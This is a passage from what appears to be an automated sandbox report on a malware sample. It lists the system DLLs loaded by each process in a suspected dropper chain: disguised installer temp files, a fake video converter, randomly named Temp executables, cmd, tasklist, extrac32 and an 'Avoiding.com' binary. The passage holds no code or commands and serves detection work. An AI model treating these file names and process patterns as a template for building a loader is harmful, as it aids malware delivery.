                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: shfolder.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: msacm32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: winmmbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: sfc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: sqlite3.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: appxsip.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: opcservices.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: shfolder.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: iconcodecservice.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: riched20.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: usp10.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: msls31.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
                            Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: wsock32.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.comSection loaded: rasadhlp.dll
                            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: shfolder.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: rstrtmgr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: textinputframework.dll
